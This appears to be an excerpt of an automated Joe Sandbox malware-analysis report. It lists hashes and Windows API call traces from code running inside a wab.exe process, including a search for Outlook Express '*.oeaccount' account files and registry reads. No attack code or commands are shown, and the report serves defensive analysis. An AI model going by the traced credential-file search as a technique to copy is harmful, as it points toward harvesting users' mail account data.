                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                  • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                  • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                  • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                  • memset.MSVCRT ref: 0040128E
                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                  • String ID:
                                                  • API String ID: 2998058495-0
                                                  • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                  • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcslen.MSVCRT ref: 0044406C
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                  • strlen.MSVCRT ref: 004440D1
                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                  • memcpy.MSVCRT ref: 004440EB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                  • String ID:
                                                  • API String ID: 577244452-0
                                                  • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                  • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%